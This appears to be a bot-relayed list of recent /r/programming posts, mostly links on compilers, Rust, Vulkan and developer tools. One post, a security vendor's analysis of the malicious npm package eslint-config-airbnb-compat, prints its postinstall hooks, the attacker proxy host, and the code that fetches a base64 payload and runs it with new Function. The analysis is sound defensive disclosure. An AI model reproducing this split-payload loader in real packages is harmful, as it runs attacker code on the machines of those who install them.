214
I will send you newest post from subreddit /r/programming
How much code does that proc macro generate?
https://www.reddit.com/r/programming/comments/1lle1q6/how_much_code_does_that_proc_macro_generate/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://nnethercote.github.io/2025/06/26/how-much-code-does-that-proc-macro-generate.html) [comments] (https://www.reddit.com/r/programming/comments/1lle1q6/how_much_code_does_that_proc_macro_generate/)
GCC 15 Continuously Improving AArch64
https://www.reddit.com/r/programming/comments/1lldzp5/gcc_15_continuously_improving_aarch64/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://community.arm.com/arm-community-blogs/b/tools-software-ides-blog/posts/gcc-15-continuously-improving) [comments] (https://www.reddit.com/r/programming/comments/1lldzp5/gcc_15_continuously_improving_aarch64/)
How much slower is random access, really?
https://www.reddit.com/r/programming/comments/1lldxio/how_much_slower_is_random_access_really/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://samestep.com/blog/random-access/) [comments] (https://www.reddit.com/r/programming/comments/1lldxio/how_much_slower_is_random_access_really/)
GitHub - yawaramin/dream-html: Type-safe markup rendering, form validation, and routing for OCaml Dream web framework
https://www.reddit.com/r/programming/comments/1llb4i0/github_yawaramindreamhtml_typesafe_markup/
submitted by /u/yawaramin (https://www.reddit.com/user/yawaramin)
[link] (https://github.com/yawaramin/dream-html) [comments] (https://www.reddit.com/r/programming/comments/1llb4i0/github_yawaramindreamhtml_typesafe_markup/)
Memory Safety is Merely Table Stakes
https://www.reddit.com/r/programming/comments/1ll9vcc/memory_safety_is_merely_table_stakes/
submitted by /u/exobrain (https://www.reddit.com/user/exobrain)
[link] (https://www.usenix.org/publications/loginonline/memory-safety-merely-table-stakes) [comments] (https://www.reddit.com/r/programming/comments/1ll9vcc/memory_safety_is_merely_table_stakes/)
So Long, Image Layouts: Simplifying Vulkan Synchronisation
https://www.reddit.com/r/programming/comments/1ll1ju8/so_long_image_layouts_simplifying_vulkan/
submitted by /u/GamerY7 (https://www.reddit.com/user/GamerY7)
[link] (https://www.khronos.org/blog/so-long-image-layouts-simplifying-vulkan-synchronisation) [comments] (https://www.reddit.com/r/programming/comments/1ll1ju8/so_long_image_layouts_simplifying_vulkan/)
Malicious npm eslint-config-airbnb-compat Package Hides Detection with Payload Splitting
https://www.reddit.com/r/programming/comments/1lkz2oa/malicious_npm_eslintconfigairbnbcompat_package/
<!-- SC_OFF -->Malicious open source packages are sometimes hard to detect because attackers smartly split the payload across multiple packages and assemble them together through the dependency chain. We found one such example in npm package eslint-config-airbnb-compat which most likely was attempting to impersonate eslint-config-airbnb with over 4M weekly download. Our conventional static code analysis based approach missed identifying eslint-config-airbnb-compat as malicious because the payload was split between eslint-config-airbnb-compat and its transitive dependency ts-runtime-compat-check. But we managed to detect it anyway due to some runtime analysis anomalies. Analysis eslint-config-airbnb-compat contains a post install script to execute setup.js "postinstall": "node ./setup", However, to avoid identification, the setup.js does not have any malicious code. It simply does the following: Copy the embedded .env.example to .env if (!fs.existsSync(".env")) { fs.copyFileSync(".env.example", ".env"); process.env.APP_PATH=process.cwd(); } The .env file contains the following APP_ENV=local APP_PROXY=https://proxy.eslint-proxy.site APP_LOCAL= ESLINT_DEBUG=true FORCE_COLOR=1 Execute npm install if node_modules directory is not present if (!fs.existsSync("node_modules")) { run('npm install'); } This may not appear as malicious but one of the transitive dependencies introduced by this package is ts-runtime-compat-check. This package in turn have a post install script: "postinstall": "node lib/install.js", The lib/install.js contains interesting code: const appPath = process.env.APP_PATH || 'http://localhost'; const proxy = process.env.APP_PROXY || 'http://localhost'; const response = await fetch( `${proxy}/api/v1/hb89/data?appPath=${appPath}` ); When introduced through eslint-config-airbnb-compat, it will have proxy=https://proxy.eslint-proxy.site in the fetch(..) call above. The above fetch call is expected to fail to trigger errorHandler function with remote server provided error message if (!response.ok) { const apiError = await response.json(); throw new Error(apiError.error); } await response.json(); } catch (err) { errorHandler(err.message); } So the remote server at https://proxy.eslint-proxy.site can return a JSON message such as {"error": ""} which in turn will be passed to errorHandler as an Error object. The error handler in turn does the following: Decode the message as base64 string const decoded = Buffer.from(error, "base64").toString("utf-8"); Constructs a function from the decoded string const handler = new Function.constructor("require", errCode); Finally executes the remote code const handlerFunc = createHandler(decoded); if (handlerFunc) { handlerFunc(require); } else { console.error("Handler function is not available."); } p.s: I am the author and maintainer of https://github.com/safedep/vet and we work to continuously detect and report malicious packages. <!-- SC_ON --> submitted by /u/Ok_Possibility1445 (https://www.reddit.com/user/Ok_Possibility1445)
[link] (https://safedep.io/digging-into-dynamic-malware-analysis-signals/) [comments] (https://www.reddit.com/r/programming/comments/1lkz2oa/malicious_npm_eslintconfigairbnbcompat_package/)
The importance of kindness in engineering
https://www.reddit.com/r/programming/comments/1lktp8d/the_importance_of_kindness_in_engineering/
<!-- SC_OFF -->Remember when you just started out and a senior sat with you and explained some basic concepts behind their code without judgement and patience? Remember when you saw a colleague working on a gnarly problem and you stepped in to pair with them or vice versa? Remember when you were extremely tired and someone chased you for an update on a piece of work that was not a priority. Instead of snapping at them you took a breath and explained why you could not look into it right now but would circle back to them in a week or so? Kindness is not only about reactive patience and being helpful but also influences the way we work. <!-- SC_ON --> submitted by /u/AlexandraLinnea (https://www.reddit.com/user/AlexandraLinnea)
[link] (https://ashouri.xyz/post/kindnessinengineering) [comments] (https://www.reddit.com/r/programming/comments/1lktp8d/the_importance_of_kindness_in_engineering/)
Dark explained recursion very well.
https://www.reddit.com/r/programming/comments/1lktflr/dark_explained_recursion_very_well/
<!-- SC_OFF -->I have trouble learning the concept of recursive programming, no matter how hard i try i can’t visualize it clearly, i just finished rewatching dark tv show by Netflix the whole concept of the show is based on recursion. If you are have trouble like i did, i would recommend watching it. <!-- SC_ON --> submitted by /u/wizardxxdx (https://www.reddit.com/user/wizardxxdx)
[link] (https://www.rottentomatoes.com/tv/dark/s03) [comments] (https://www.reddit.com/r/programming/comments/1lktflr/dark_explained_recursion_very_well/)
Why Smart Developers Rely on Libraries
https://www.reddit.com/r/programming/comments/1lkqx73/why_smart_developers_rely_on_libraries/
submitted by /u/Heavy-Elk8273 (https://www.reddit.com/user/Heavy-Elk8273)
[link] (https://youtu.be/aHKw0tUhcY8) [comments] (https://www.reddit.com/r/programming/comments/1lkqx73/why_smart_developers_rely_on_libraries/)
Stack grows down, but local variables grow up? Let me explain
https://www.reddit.com/r/programming/comments/1lknl08/stack_grows_down_but_local_variables_grow_up_let/
submitted by /u/nalaginrut (https://www.reddit.com/user/nalaginrut)
[link] (https://www.gizvault.com/archives/stack-growth-differs-from-locals-growth) [comments] (https://www.reddit.com/r/programming/comments/1lknl08/stack_grows_down_but_local_variables_grow_up_let/)
Once more about dynamic_cast, a real use case
https://www.reddit.com/r/programming/comments/1lkaa1n/once_more_about_dynamic_cast_a_real_use_case/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://www.sandordargo.com/blog/2025/06/25/once-more-about-dynamic-casts) [comments] (https://www.reddit.com/r/programming/comments/1lkaa1n/once_more_about_dynamic_cast_a_real_use_case/)
Coding Independent Code Points (cICP) in PNG, explained
https://www.reddit.com/r/programming/comments/1lka6fh/coding_independent_code_points_cicp_in_png/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://svgees.us/blog/cICP.html) [comments] (https://www.reddit.com/r/programming/comments/1lka6fh/coding_independent_code_points_cicp_in_png/)
Subsecond: A runtime hotpatching engine for Rust hot-reloading
https://www.reddit.com/r/programming/comments/1lka3fq/subsecond_a_runtime_hotpatching_engine_for_rust/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://docs.rs/subsecond/0.7.0-alpha.1/subsecond/index.html) [comments] (https://www.reddit.com/r/programming/comments/1lka3fq/subsecond_a_runtime_hotpatching_engine_for_rust/)
Reading NFC Passport Chips in Linux
https://www.reddit.com/r/programming/comments/1lk9zwc/reading_nfc_passport_chips_in_linux/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://shkspr.mobi/blog/2025/06/reading-nfc-passport-chips-in-linux/) [comments] (https://www.reddit.com/r/programming/comments/1lk9zwc/reading_nfc_passport_chips_in_linux/)
Weird expressions in rust
https://www.reddit.com/r/programming/comments/1lle00s/weird_expressions_in_rust/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://www.wakunguma.com/blog/rust-weird-expr) [comments] (https://www.reddit.com/r/programming/comments/1lle00s/weird_expressions_in_rust/)
Muvera: Making multi-vector retrieval as fast as single-vector search
https://www.reddit.com/r/programming/comments/1lldy96/muvera_making_multivector_retrieval_as_fast_as/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://research.google/blog/muvera-making-multi-vector-retrieval-as-fast-as-single-vector-search/) [comments] (https://www.reddit.com/r/programming/comments/1lldy96/muvera_making_multivector_retrieval_as_fast_as/)
"Why is the Rust compiler so slow?"
https://www.reddit.com/r/programming/comments/1lldxe8/why_is_the_rust_compiler_so_slow/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://sharnoff.io/blog/why-rust-compiler-slow) [comments] (https://www.reddit.com/r/programming/comments/1lldxe8/why_is_the_rust_compiler_so_slow/)
Finding a 27-year-old easter egg in the Power Mac G3 ROM
https://www.reddit.com/r/programming/comments/1ll9xe5/finding_a_27yearold_easter_egg_in_the_power_mac/
submitted by /u/NXGZ (https://www.reddit.com/user/NXGZ)
[link] (https://www.downtowndougbrown.com/2025/06/finding-a-27-year-old-easter-egg-in-the-power-mac-g3-rom/) [comments] (https://www.reddit.com/r/programming/comments/1ll9xe5/finding_a_27yearold_easter_egg_in_the_power_mac/)
What is OpenTelemetry? [not in a nutshell] :)
https://www.reddit.com/r/programming/comments/1ll5vgx/what_is_opentelemetry_not_in_a_nutshell/
submitted by /u/elizObserves (https://www.reddit.com/user/elizObserves)
[link] (https://signoz.io/blog/what-is-opentelemetry/) [comments] (https://www.reddit.com/r/programming/comments/1ll5vgx/what_is_opentelemetry_not_in_a_nutshell/)
Box combinators
https://www.reddit.com/r/programming/comments/1ll1h47/box_combinators/
submitted by /u/Xadartt (https://www.reddit.com/user/Xadartt)
[link] (https://mmapped.blog/posts/41-box-combinators) [comments] (https://www.reddit.com/r/programming/comments/1ll1h47/box_combinators/)
Programming as Theory Building: Why Senior Developers Are More Valuable Than Ever
https://www.reddit.com/r/programming/comments/1lkx4ts/programming_as_theory_building_why_senior/
submitted by /u/cekrem (https://www.reddit.com/user/cekrem)
[link] (https://cekrem.github.io/posts/programming-as-theory-building-naur/) [comments] (https://www.reddit.com/r/programming/comments/1lkx4ts/programming_as_theory_building_why_senior/)
Built a cleaner, ad-free version of Chrome Dino with leaderboard & devtool hacks — would love feedback!
https://www.reddit.com/r/programming/comments/1lktk32/built_a_cleaner_adfree_version_of_chrome_dino/
<!-- SC_OFF -->Hey folks! I recently rebuilt the Chrome Dino game as a side project — but added some cool stuff to make it fun for devs: You can use Chrome DevTools to hack the game speed, jump height, or even make the dino invisible Works right in the browser — no login, no ads The idea was to make it a lightweight JavaScript playground + nostalgia hit 🤓 👉 https://dinogamerunner.in (https://dinogamerunner.in/) Would love your feedback — and if you’ve done similar browser-based builds, drop your links! 🙌 <!-- SC_ON --> submitted by /u/manishpamnani169 (https://www.reddit.com/user/manishpamnani169)
[link] (https://dinogamerunner.in/) [comments] (https://www.reddit.com/r/programming/comments/1lktk32/built_a_cleaner_adfree_version_of_chrome_dino/)
FlyonUI - Open Sources Free Tailwind CSS Components Library
https://www.reddit.com/r/programming/comments/1lkrap0/flyonui_open_sources_free_tailwind_css_components/
submitted by /u/Saanvi_Sen (https://www.reddit.com/user/Saanvi_Sen)
[link] (https://flyonui.com/) [comments] (https://www.reddit.com/r/programming/comments/1lkrap0/flyonui_open_sources_free_tailwind_css_components/)
help enabling uart in stm nucleo
https://www.reddit.com/r/programming/comments/1lkqrit/help_enabling_uart_in_stm_nucleo/
<!-- SC_OFF -->I am having issues while enabling nucelos serial I want help to enable it is there anyone who has worked with nucleo f413zh <!-- SC_ON --> submitted by /u/Inside-Reference9884 (https://www.reddit.com/user/Inside-Reference9884)
[link] (https://www.youtube.com/watch?v=KdXSRyPCYuM&list=PLfIJKC1ud8gjmw-l5eDYfzzX5JI19lwhx) [comments] (https://www.reddit.com/r/programming/comments/1lkqrit/help_enabling_uart_in_stm_nucleo/)
DockedUp: A Terminal Dashboard for Docker Containers, Built in Python
https://www.reddit.com/r/programming/comments/1lkmja0/dockedup_a_terminal_dashboard_for_docker/
<!-- SC_OFF -->Hello r/programming (https://www.reddit.com/r/programming)! I’ve been working on DockedUp, a CLI tool that makes monitoring Docker containers easier and more intuitive. If you’re tired of juggling docker ps, docker stats, and switching terminals to check logs or restart containers, this might be for you! What My Project Does DockedUp is a real-time, interactive dashboard that displays your Docker containers’ status, health, CPU, and memory usage in a clean, color-coded terminal view. It automatically groups containers by docker-compose projects and uses emojis to make status (Up 🟢, Down 🔴) and health (Healthy ✅, Unhealthy ⚠️) instantly clear. Navigate containers with arrow keys and use hotkeys to: - l: View live logs - r: Restart a container - x: Stop a container - s: Open a shell inside a container Target Audience DockedUp is designed for developers and DevOps engineers who work with Docker containers and want a quick, unified view of their environment without leaving the terminal. It’s ideal for those managing docker-compose stacks in development or small-scale production setups. Whether you’re a Python enthusiast, a CLI lover, or a DevOps pro looking to streamline workflows, DockedUp is built to save you time and hassle. Comparison Unlike docker ps and docker stats, which require multiple commands and terminal switching, DockedUp offers a single, live-updating dashboard with interactive controls. Compared to tools like Portainer (web-based) or lazydocker (another CLI), DockedUp is lightweight, focuses on docker-compose project grouping, and integrates emoji-based visual cues for quick status checks. It’s Python-based, easy to install via PyPI, and doesn’t need a web server, making it a great fit for terminal-centric workflows. Try It Out It’s on PyPI and takes one command to install (I recommend pipx for CLI tools): bash pipx install dockedup Or: bash pip install dockedup Then run dockedup to start the monitor. Check out the GitHub repo (https://github.com/anilrajrimal1/dockedup) for more details and setup instructions. If you like the project, I’d really appreciate a ⭐ on GitHub to help spread the word! Feedback Wanted! I’d love to hear your thoughts—any features you’d like to see or issues you run into? Contributions are welcome (it’s MIT-licensed). What’s your go-to way to monitor Docker containers? Thanks for checking it out! 🚀 <!-- SC_ON --> submitted by /u/Fragrant_Letter8595 (https://www.reddit.com/user/Fragrant_Letter8595)
[link] (https://github.com/anilrajrimal1/dockedup) [comments] (https://www.reddit.com/r/programming/comments/1lkmja0/dockedup_a_terminal_dashboard_for_docker/)
How to Think about Parallel Programming: Not! [video]
https://www.reddit.com/r/programming/comments/1lka7v5/how_to_think_about_parallel_programming_not_video/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://www.infoq.com/presentations/Thinking-Parallel-Programming/) [comments] (https://www.reddit.com/r/programming/comments/1lka7v5/how_to_think_about_parallel_programming_not_video/)
Printing the web: making webpages look good on paper
https://www.reddit.com/r/programming/comments/1lka4qx/printing_the_web_making_webpages_look_good_on/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://piccalil.li/blog/printing-the-web-making-webpages-look-good-on-paper/) [comments] (https://www.reddit.com/r/programming/comments/1lka4qx/printing_the_web_making_webpages_look_good_on/)
The probability of a hash collision
https://www.reddit.com/r/programming/comments/1lka2sb/the_probability_of_a_hash_collision/
submitted by /u/ketralnis (https://www.reddit.com/user/ketralnis)
[link] (https://kevingal.com/blog/collisions.html) [comments] (https://www.reddit.com/r/programming/comments/1lka2sb/the_probability_of_a_hash_collision/)
Handling HTTP in [A]synchronous Functional Programming
https://www.reddit.com/r/programming/comments/1lk5njx/handling_http_in_asynchronous_functional/
submitted by /u/richytong (https://www.reddit.com/user/richytong)
[link] (https://rubico.land/blog/a-synchronous-functional-programming-handling-http) [comments] (https://www.reddit.com/r/programming/comments/1lk5njx/handling_http_in_asynchronous_functional/)